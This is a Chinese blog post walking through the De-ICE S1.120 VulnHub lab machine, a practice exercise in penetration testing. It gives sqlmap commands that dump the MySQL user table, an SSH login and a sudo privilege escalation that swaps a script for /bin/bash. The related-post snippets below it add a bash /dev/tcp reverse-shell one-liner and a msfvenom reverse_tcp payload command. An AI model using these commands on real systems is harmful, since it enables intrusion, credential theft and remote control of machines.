De-ICE_S1.120靶机复现

已于 2024-07-31 09:34:31 修改
阅读量243 收藏 9
点赞数 4
文章标签: 网络安全
于 2024-07-30 22:47:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/140808752
版权

靶机设置

将kali和靶机都设置为仅主机模式

查看MAC地址

查看靶机IP

nmap 192.168.1.0/24

访问浏览器

点击Add product

查看xss注入

输入<img src=x>

发现存在反射型xss注入

查看sql注入

发现存在参数

进行sql注入查询http://192.168.1.120/products.php?id=2

使用sqlmap查询

发现存在SQL注入

查看数据库

python sqlmap.py -u http://192.168.1.120/products.php?id=2 --dbs --batch

查看mysql数据库的表

python sqlmap.py -u http://192.168.1.120/products.php?id=2 -D mysql --tables --batch

查看账户密码

python sqlmap.py -u http://192.168.1.120/products.php?id=2 -D mysql -T user -C user,password --dump --batch

ssh远程连接

因为ssh服务开启,尝试远程连接

ssh ccoffee@192.168.1.120

连接成功

提权

sudo -l

发现存在免密getlogs.sh

尝试suid提权

find / -perm -u=s -type f 2>/dev/null

到/home/ccoffee/scripts路径下

将getlogs.sh更改为其他名字,将/bin/bash改为getlogs.sh

mv getlogs.sh getlogs1.sh

echo "/bin/bash" > getlogs.sh

chmod 777 getlogs.sh

sudo /home/ccoffee/scripts/getlogs.sh

whoami

id

发现用户为root

提权成功

CcHKer
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1447
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
struts2-cve_2017_5638漏洞
0day
02-19 1819
struts2-cve_2017_5638漏洞 漏洞概述 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实的Web应用程序框架。 Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakar.
【漏洞-jquery-文件上传】vulfocus/jquery-cve_2018_9207
10-07 2008
【jquery-文件上传】
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3706
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行
1stPeak's Blog
04-12 2945
一、漏洞描述 HTTP协议栈(HTTP.sys)存在远程代码执行漏洞,是由于HTTP.sys不正确的解析HTTP请求引起的,成功利用此漏洞的攻击者可以执行系统账户上任意代码。 攻击者必须发送一个HTTP请求到受影响的系统去触发这个漏洞,通过修改Windows HTTP栈处理请求更新漏洞地址。 主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受
(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3591
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
maccms-cve_2017_17733漏洞
qq_51459600的博客
03-02 3966
maccms-cve_2017_17733 Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。 环境搭建 靶机:CentOS7(192.168.2.110) 利用本地vulfocus平台一键搭建maccms环境: 环境搭建完成 漏洞利用 访问http://192.168.2.110:59973/index.php?m=vod-search post提
JIS-CTF-VulnUpload-CTF01靶机渗透测试
weixin_52971422的博客
04-11 3507
靶机名:JIS-CTF-VulnUpload-CTF01 攻击机:kali 任务寻找5个flag 靶机信息扫描 Nmap -sV -A -p- ip 信息收集 发有Robots协议 上网页 成功拿到第一个flag 上到/admin_area发了第二个flag和网页用户 上到/login.php登录 登录上去后发有个文件上传 直接上传一个shell.php上去看看 好像成功上传上去了,在前面robots.txt里有uploaded_files的
Mr.Robot靶机 - 机器人先生
Ms08067安全实验室
03-02 2201
本文作者:恩格尔-src小组﹀﹀﹀靶机简介:靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的...
fastjson1.2.47RCE漏洞的
Mrs_H的博客
10-04 1894
Fastjson1.2.47RCE漏洞 前言 我在上一篇文章中提到了我在长安杯打比赛,有一道我怎么也看不懂的题目,也就是当时“soeasy”。当我我查阅资料以及看了其他师傅们的wp之后,我发这是Fastjson的一个RCE漏洞。因为以前接触Java的时间比较短,还不够熟悉,所以就去搞了个环境这个Fastjson的RCE漏洞。也就有了这篇文章。 环境准备 为了方便起见,我这次直接选择了vulhub的docker环境,有两种方式可以去获得项目源码 一种是直接在github上down下来 https:/
Kioptrix2-WalkThrough 靶机.docx
10-18
Kioptrix2-WalkThrough 靶机 本文将对 Kioptrix2 靶机的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。... ... ...访问控制是 Windows 操作系统安全的重要组成部分。访问控制列表(Access Control List,ACL)是 NTFS 文件系统的重要组成...
CFS.zip_CFS-GA_cfs
09-21
1. **混沌序列生成**:CFS的核心是使用混沌系统生成伪随机序列,这些序列用于混淆数据。混沌系统的特性使其产生的序列具有高度的不可预测性,增强了加密的安全性。 2. **数据分块**:原始文件被分割成多个小的数据...
Metasploitable_ubuntu-book.zip
07-14
《Metasploit渗透测试魔鬼训练营》中的"Metasploitable_ubuntu-book.zip"是一个针对安全研究人员和IT专业人员的教育资源,它提供了一个Linux靶机环境,特别适合学习和测试安全漏洞。靶机,简单来说,就是一种模拟...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
chromedriver-mac-x64_121.0.6167.184.zip
最新发布
07-31
chromedriver-mac-x64_121.0.6167.184.zip
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。.zip
07-31
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe这个IP是靶机IP还是虚拟机ip
05-27
这个 IP 是指你的攻击机器 (Kali Linux) 上用于监听的 IP 地址。 假设你的攻击机器 IP 地址为 192.168.1.100,你想要在靶机上运行一个反向 TCP Meterpreter,那么你可以使用以下命令生成 Payload 文件: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe ``` 其中,LHOST 参数指定了反向连接时的目标 IP 地址,即指定 Meterpreter 连接的攻击机器 IP 地址。LPORT 参数指定了监听的端口号,这个端口号需要和后面启动 Meterpreter listener 时使用的端口号一致。 在生成 Payload 文件后,你需要将它传输到靶机上,并在靶机上运行它。当 Payload 文件在靶机上被执行时,它会尝试连接到你指定的攻击机器 IP 地址和端口号,从而建立反向连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值